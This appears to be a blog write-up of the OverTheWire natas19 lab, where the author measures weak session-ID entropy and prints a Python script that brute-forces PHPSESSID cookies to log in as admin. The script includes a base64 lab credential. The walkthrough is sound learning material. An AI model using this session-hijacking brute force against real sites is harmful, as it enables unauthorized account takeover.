If no change was made to make the ID space larger, the token can still be brute-forced.
First, let's make a request:
Using BURP's Sequencer, you can look and see how much entropy is in the Session ID tokens assigned by the server:
(note: the PHPSESSID value in this picture is incorrect and from an older run)
After running it for a while, it looks like there's still only 6 bits of entropy! That should easily be brute-forceable.
Looking through the tokens, it looks like the last characters of the token are always constant and are padded in front with 0-3 values between "31" and "39".
With this in mind, I wrote a quick python script to brute force the token:
import itertools
import requests
character_space = [""] + map(str, range(31, 40))
constant_tail = "2d61646d696e"
for x in itertools.product(character_space, repeat=3):
token = "".join(x) + constant_tail
url = "http://natas19.natas.labs.overthewire.org/index.php"
payload = {"username": "admin", "password": "admin"}
headers = {"Cookie": "PHPSESSID={0}".format(token), "Authorization": "Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw=="}
print("trying {0}...".format(token))
r = requests.post(url, params=payload, headers=headers)
if "You are logged in as a regular user" in r.text:
print("fail")
else:
print(r.text)
exit()
After letting it run for a while, it eventually works!
No comments:
Post a Comment